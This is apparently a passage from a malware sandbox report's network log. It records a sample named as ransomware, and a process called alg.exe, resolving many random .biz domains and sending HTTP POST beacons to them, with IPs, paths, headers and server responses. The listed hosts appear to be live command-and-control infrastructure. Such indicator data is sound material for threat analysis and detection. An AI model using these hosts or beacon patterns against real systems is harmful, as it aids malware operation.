User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:39:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=81e6e687f938e772d029f75fa6e99ee5|194.110.13.70|1723257571|1723257571|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

177.188.244.54.in-addr.arpa

Remote address:

8.8.8.8:53

Request

177.188.244.54.in-addr.arpa

IN PTR

Response

177.188.244.54.in-addr.arpa

IN PTR

ec2-54-244-188-177 us-west-2compute amazonawscom
DNS

cvgrf.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

cvgrf.biz

IN A

Response

cvgrf.biz

IN A

54.244.188.177
POST

http://cvgrf.biz/j

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

54.244.188.177:80

Request

POST /j HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:39:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=94c93aa3ca1b678eb33d1f5b07a5ff84|194.110.13.70|1723257573|1723257573|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://cvgrf.biz/j

alg.exe

Remote address:

54.244.188.177:80

Request

POST /j HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:39:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=28cfe5b095fc60752dd27b26572c7836|194.110.13.70|1723257573|1723257573|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

107.10.141.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

107.10.141.18.in-addr.arpa

IN PTR

Response

107.10.141.18.in-addr.arpa

IN PTR

ec2-18-141-10-107ap-southeast-1compute amazonawscom
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.dual-a-0034.a-msedge.net

g-bing-com.dual-a-0034.a-msedge.net

IN CNAME

dual-a-0034.a-msedge.net

dual-a-0034.a-msedge.net

IN A

13.107.21.237

dual-a-0034.a-msedge.net

IN A

204.79.197.237
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=452aeefe4b0d4a8f85df8d1a30bd4c5e&localId=w:C1C7FDA1-57D8-3617-175E-F6F87939E990&deviceId=6755468654767491&anid=

Remote address:

13.107.21.237:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=452aeefe4b0d4a8f85df8d1a30bd4c5e&localId=w:C1C7FDA1-57D8-3617-175E-F6F87939E990&deviceId=6755468654767491&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=1CEC946A6C9A68FF3E1C80BD6D2169D2; domain=.bing.com; expires=Thu, 04-Sep-2025 02:39:35 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: C1B0F295BAD2442C9FCB4ADB07E8D7CB Ref B: LON04EDGE0908 Ref C: 2024-08-10T02:39:35Z
date: Sat, 10 Aug 2024 02:39:35 GMT
GET

https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=452aeefe4b0d4a8f85df8d1a30bd4c5e&localId=w:C1C7FDA1-57D8-3617-175E-F6F87939E990&deviceId=6755468654767491&anid=

Remote address:

13.107.21.237:443

Request

GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=452aeefe4b0d4a8f85df8d1a30bd4c5e&localId=w:C1C7FDA1-57D8-3617-175E-F6F87939E990&deviceId=6755468654767491&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=1CEC946A6C9A68FF3E1C80BD6D2169D2

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=JyE6ptWX54y6Fa86vs5p8MKJQkCfelz31tJ6m6phd_Y; domain=.bing.com; expires=Thu, 04-Sep-2025 02:39:36 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9DC7E28A66014193A4C9158434DC76EC Ref B: LON04EDGE0908 Ref C: 2024-08-10T02:39:36Z
date: Sat, 10 Aug 2024 02:39:36 GMT
GET

https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=452aeefe4b0d4a8f85df8d1a30bd4c5e&localId=w:C1C7FDA1-57D8-3617-175E-F6F87939E990&deviceId=6755468654767491&anid=

Remote address:

13.107.21.237:443

Request

GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=452aeefe4b0d4a8f85df8d1a30bd4c5e&localId=w:C1C7FDA1-57D8-3617-175E-F6F87939E990&deviceId=6755468654767491&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=1CEC946A6C9A68FF3E1C80BD6D2169D2; MSPTC=JyE6ptWX54y6Fa86vs5p8MKJQkCfelz31tJ6m6phd_Y

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 571E5BE1FBA14825BA01C6FF542CCC00 Ref B: LON04EDGE0908 Ref C: 2024-08-10T02:39:36Z
date: Sat, 10 Aug 2024 02:39:36 GMT
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

npukfztj.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

npukfztj.biz

IN A

Response

npukfztj.biz

IN A

44.221.84.105
POST

http://npukfztj.biz/pxestalrit

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

44.221.84.105:80

Request

POST /pxestalrit HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:39:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bdc985352289a7396d5b4cc851013139|194.110.13.70|1723257573|1723257573|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://npukfztj.biz/upfet

alg.exe

Remote address:

44.221.84.105:80

Request

POST /upfet HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:39:33 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fbaf09f9912afe91b507080360c89200|194.110.13.70|1723257573|1723257573|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

przvgke.biz

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

8.8.8.8:53

Request

przvgke.biz

IN A

Response

przvgke.biz

IN A

172.234.222.138

przvgke.biz

IN A

172.234.222.143
DNS

237.21.107.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

237.21.107.13.in-addr.arpa

IN PTR

Response
DNS

105.84.221.44.in-addr.arpa

Remote address:

8.8.8.8:53

Request

105.84.221.44.in-addr.arpa

IN PTR

Response

105.84.221.44.in-addr.arpa

IN PTR

ec2-44-221-84-105 compute-1 amazonawscom
DNS

105.84.221.44.in-addr.arpa

Remote address:

8.8.8.8:53

Request

105.84.221.44.in-addr.arpa

IN PTR
POST

http://przvgke.biz/l

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

172.234.222.138:80

Request

POST /l HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922
POST

http://przvgke.biz/qnragkryuoyh

alg.exe

Remote address:

172.234.222.138:80

Request

POST /qnragkryuoyh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782
POST

http://przvgke.biz/ms

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

172.234.222.138:80

Request

POST /ms HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922
POST

http://przvgke.biz/ms

alg.exe

Remote address:

172.234.222.138:80

Request

POST /ms HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782
DNS

zlenh.biz

alg.exe

Remote address:

8.8.8.8:53

Request

zlenh.biz

IN A

Response
DNS

knjghuig.biz

alg.exe

Remote address:

8.8.8.8:53

Request

knjghuig.biz

IN A

Response

knjghuig.biz

IN A

18.141.10.107
POST

http://knjghuig.biz/vtivlyxnyxdprhwv

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

18.141.10.107:80

Request

POST /vtivlyxnyxdprhwv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:39:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7527b786a774fef749297f511d2ad203|194.110.13.70|1723257575|1723257575|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

138.222.234.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

138.222.234.172.in-addr.arpa

IN PTR

Response

138.222.234.172.in-addr.arpa

IN PTR

172-234-222-138iplinodeusercontentcom
DNS

uhxqin.biz

alg.exe

Remote address:

8.8.8.8:53

Request

uhxqin.biz

IN A

Response
DNS

anpmnmxo.biz

alg.exe

Remote address:

8.8.8.8:53

Request

anpmnmxo.biz

IN A

Response
DNS

lpuegx.biz

alg.exe

Remote address:

8.8.8.8:53

Request

lpuegx.biz

IN A

Response

lpuegx.biz

IN A

82.112.184.197
DNS

zlenh.biz

alg.exe

Remote address:

8.8.8.8:53

Request

zlenh.biz

IN A

Response
DNS

knjghuig.biz

alg.exe

Remote address:

8.8.8.8:53

Request

knjghuig.biz

IN A

Response

knjghuig.biz

IN A

18.141.10.107
POST

http://knjghuig.biz/jwncgojbqiyxqnoe

alg.exe

Remote address:

18.141.10.107:80

Request

POST /jwncgojbqiyxqnoe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:39:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4927e2c96fcea7f79a9dc84ae58e290c|194.110.13.70|1723257579|1723257579|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

uhxqin.biz

alg.exe

Remote address:

8.8.8.8:53

Request

uhxqin.biz

IN A

Response
DNS

anpmnmxo.biz

alg.exe

Remote address:

8.8.8.8:53

Request

anpmnmxo.biz

IN A

Response
DNS

lpuegx.biz

alg.exe

Remote address:

8.8.8.8:53

Request

lpuegx.biz

IN A

Response

lpuegx.biz

IN A

82.112.184.197
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR

Response
DNS

157.123.68.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

157.123.68.40.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

vjaxhpbji.biz

alg.exe

Remote address:

8.8.8.8:53

Request

vjaxhpbji.biz

IN A

Response

vjaxhpbji.biz

IN A

82.112.184.197
DNS

vjaxhpbji.biz

alg.exe

Remote address:

8.8.8.8:53

Request

vjaxhpbji.biz

IN A

Response

vjaxhpbji.biz

IN A

82.112.184.197
DNS

48.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.229.111.52.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

57.169.31.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

57.169.31.20.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

xlfhhhm.biz

alg.exe

Remote address:

8.8.8.8:53

Request

xlfhhhm.biz

IN A

Response

xlfhhhm.biz

IN A

47.129.31.212
POST

http://xlfhhhm.biz/nh

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

47.129.31.212:80

Request

POST /nh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6ec95925f39bdbad8d4814ab568ce96d|194.110.13.70|1723257661|1723257661|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ifsaia.biz

alg.exe

Remote address:

8.8.8.8:53

Request

ifsaia.biz

IN A

Response

ifsaia.biz

IN A

13.251.16.150
POST

http://ifsaia.biz/cjhtqkidtbxyl

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

13.251.16.150:80

Request

POST /cjhtqkidtbxyl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d9ed10a6c0052f4c7c1491532e0e13f4|194.110.13.70|1723257662|1723257662|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

212.31.129.47.in-addr.arpa

Remote address:

8.8.8.8:53

Request

212.31.129.47.in-addr.arpa

IN PTR

Response

212.31.129.47.in-addr.arpa

IN PTR

ec2-47-129-31-212ap-southeast-1compute amazonawscom
DNS

saytjshyf.biz

alg.exe

Remote address:

8.8.8.8:53

Request

saytjshyf.biz

IN A

Response

saytjshyf.biz

IN A

44.221.84.105
POST

http://saytjshyf.biz/p

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

44.221.84.105:80

Request

POST /p HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: saytjshyf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=37d17d69399495a142ee0cbfe55734f1|194.110.13.70|1723257663|1723257663|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

vcddkls.biz

alg.exe

Remote address:

8.8.8.8:53

Request

vcddkls.biz

IN A

Response

vcddkls.biz

IN A

18.141.10.107
POST

http://vcddkls.biz/ndafyecfudrj

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

18.141.10.107:80

Request

POST /ndafyecfudrj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=52b8eb80fe066f68b1ff1a6b2a1bd251|194.110.13.70|1723257664|1723257664|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

150.16.251.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

150.16.251.13.in-addr.arpa

IN PTR

Response

150.16.251.13.in-addr.arpa

IN PTR

ec2-13-251-16-150ap-southeast-1compute amazonawscom
DNS

xlfhhhm.biz

alg.exe

Remote address:

8.8.8.8:53

Request

xlfhhhm.biz

IN A

Response

xlfhhhm.biz

IN A

47.129.31.212
POST

http://xlfhhhm.biz/cwjsf

alg.exe

Remote address:

47.129.31.212:80

Request

POST /cwjsf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=73d4e43516d7e2b27ff6f013d7a9bb6b|194.110.13.70|1723257664|1723257664|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

fwiwk.biz

alg.exe

Remote address:

8.8.8.8:53

Request

fwiwk.biz

IN A

Response

fwiwk.biz

IN A

172.234.222.143

fwiwk.biz

IN A

172.234.222.138
POST

http://fwiwk.biz/rspha

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

172.234.222.143:80

Request

POST /rspha HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922
POST

http://fwiwk.biz/owxtyxujfra

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

172.234.222.143:80

Request

POST /owxtyxujfra HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922
DNS

ifsaia.biz

alg.exe

Remote address:

8.8.8.8:53

Request

ifsaia.biz

IN A

Response

ifsaia.biz

IN A

13.251.16.150
POST

http://ifsaia.biz/fifjxk

alg.exe

Remote address:

13.251.16.150:80

Request

POST /fifjxk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f02f7611352e140525dd07c34018d2c8|194.110.13.70|1723257665|1723257665|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

143.222.234.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

143.222.234.172.in-addr.arpa

IN PTR

Response

143.222.234.172.in-addr.arpa

IN PTR

172-234-222-143iplinodeusercontentcom
DNS

tbjrpv.biz

alg.exe

Remote address:

8.8.8.8:53

Request

tbjrpv.biz

IN A

Response

tbjrpv.biz

IN A

34.246.200.160
DNS

saytjshyf.biz

alg.exe

Remote address:

8.8.8.8:53

Request

saytjshyf.biz

IN A

Response

saytjshyf.biz

IN A

44.221.84.105
POST

http://tbjrpv.biz/u

2024-08-10_f6847ab67e21a9dd8b96a09b80daa65c_bkransomware.exe

Remote address:

34.246.200.160:80

Request

POST /u HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tbjrpv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 10 Aug 2024 02:41:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f100f1c6fd897c8da191d2e81a73153c|194.110.13.70|1723257666|1723257666|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=194.110.13.70; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://saytjshyf.biz/ehaoi

alg.exe

Remote address:

44.221.84.105:80

Request

POST /ehaoi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: saytjshyf.biz
